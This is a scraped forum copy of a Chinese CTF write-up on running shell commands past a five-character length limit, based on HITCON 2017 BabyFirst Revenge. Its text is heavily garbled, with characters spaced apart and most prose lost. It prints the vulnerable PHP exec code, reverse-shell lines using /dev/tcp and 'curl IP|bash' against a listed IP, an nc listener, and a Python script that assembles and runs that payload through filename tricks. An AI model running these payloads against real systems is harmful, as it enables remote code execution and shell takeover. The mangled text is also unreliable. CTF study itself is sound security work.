[21095] 2020-06-21_从一道ctf题目学到的绕过长度执行命令姿势

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-06-21_从一道ctf题目学到的绕过长度执行命令姿势 c t f 姿 L e m o n S e c   2 0 2 0 - 0 6 - 2 1 0 x 0 1 l i n u x   >     > >   1 . > 2 . > > 使 > > 0 x 0 2 l i n u x l i n u x   " " t e s t s h   h e l l o   w o r l d ! > t e s t . t x t l s e c h o   " h e l l o   w o r l d " > t e s t e c h o   " a a a " > t e s t c a t   t e s t e c h o   " b b b " > > t e s t c a t   t e s t e c h o   h e l l o   w o r l d ! s h   t e s t
0 x 0 3 l s   - t l i n u x 使 l s   - t 0 x 0 4 l s   - t     >     l s   - t     l s   - t   >   t e s t l s   - t > t e s t t e s t l s   - t t e s t   e c h o   h e l l o   w o r l d   " _ "   " h e l l o   w o r l d " 使     使     t o u c h   a t o u c h   b t o u c h   c l s   - t l s   - t > t e s t c a t   t e s t >   " r l d " >   " w o " >   " l l o   " >   " h e " >   " e c h o   " l s   - t   >   _ s h   _ e c h o   h e l l o   w o r l d
0 x 0 5 h i t c o n   2 0 1 7   b a b y f i r s t - r e v e n g e c t f s h e l l b a s h s h e l l b a s h s h e l l v p s v p s v p s 7 7 7 7 l s   - t > _ 5 l s   - t > y l s h e l l o   w o r l d < ? p h p         e r r o r _ r e p o r t i n g ( E _ A L L ) ;         $ s a n d b o x   =   ' / v a r / w w w / h t m l / s a n d b o x / ' . m d 5 ( " o r a n g e " . $ _ S E R V E R [ ' R E M O T E _ A D D R ' ] ) ;         m k d i r ( $ s a n d b o x ) ;         c h d i r ( $ s a n d b o x ) ;         i f   ( i s s e t ( $ _ G E T [ ' c m d ' ] )   & &   s t r l e n ( $ _ G E T [ ' c m d ' ] )   < =   5 )   {                 e x e c ( $ _ G E T [ ' c m d ' ] ) ;         }   e l s e   i f   ( i s s e t ( $ _ G E T [ ' r e s e t ' ] ) )   {                 e x e c ( ' / b i n / r m   - r f   '   .   $ s a n d b o x ) ;         }         h i g h l i g h t _ f i l e ( _ _ F I L E _ _ ) ; b a s h   - i   > &   / d e v / t c p / v p s i p /   0 > & 1 >   c u r l   i p | b a s h b a s h   - i   > &   / d e v / t c p / 1 2 0 . 7 9 . 3 3 . 2 5 3 / 7 7 7 7   0 > & 1 n c   - l v   7 7 7 7 > l s l s > _ >   > - t > > y l s > > _
y p y c u r l   1 2 0 . 7 9 . 3 3 . 2 5 3 | b a s h > b a s h > | > 5 3 > 2 > 3 . > 3 > 9 . > 7 > 0 . > 1 2 >   > r l > c u s h   _ s h   y # e n c o d i n g : u t f - 8 i m p o r t   r e q u e s t s b a s e u r l   =   " h t t p : / / 1 2 0 . 7 9 . 3 3 . 2 5 3 : 9 0 0 3 / ? c m d = " r e s e t   =   " h t t p : / / 1 2 0 . 7 9 . 3 3 . 2 5 3 : 9 0 0 3 / ? r e s e t " s   =   r e q u e s t s . s e s s i o n ( ) s . g e t ( r e s e t ) #   l s   - t   _ l i s t = [         " > l s " ,         " l s > _ " ,         " >   " ,         " > - t " ,         " > > y " ,         " l s > > _ " ]
s h e l l h t t p : / / 1 2 0 . 7 9 . 3 3 . 2 5 3 : 9 0 0 3 #   c u r l   1 2 0 . 7 9 . 3 3 . 2 5 3 | b a s h l i s t 2 = [         " > b a s h " ,         " > | " ,         " > 5 3 " ,         " > 2 " ,         " > 3 . " ,         " > 3 " ,         " > 9 . " ,         " > 7 " ,         " > 0 . " ,         " > 1 2 " ,         " >   " ,         " > r l " ,         " > c u " ] f o r   i   i n   l i s t :         u r l   =   b a s e u r l + s t r ( i )         s . g e t ( u r l ) f o r   j   i n   l i s t 2 :         u r l   =   b a s e u r l + s t r ( j )         s . g e t ( u r l ) s . g e t ( b a s e u r l + " s h   _ " ) s . g e t ( b a s e u r l + " s h   y " ) # s . g e t ( r e s e t ) D r a c h t t p s : / / x z . a l i y u n . c o m / t / 2 7 4 8 h t t p s : / / b l o g . c s d n . n e t / c a l m e g m / a r t i c l e / d e t a i l s / 8 0 8 7 4 9 0 2 h t t p s : / / w w w . l e a v e s o n g s . c o m / S H A R E / s o m e - t r i c k s - f r o m - m y - s e c r e t - g r o u p . h t m l h t t p s : / / b l o g . c s d n . n e t / c a l m e g m / a r t i c l e / d e t a i l s / 8 0 8 7 4 9 0 2
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则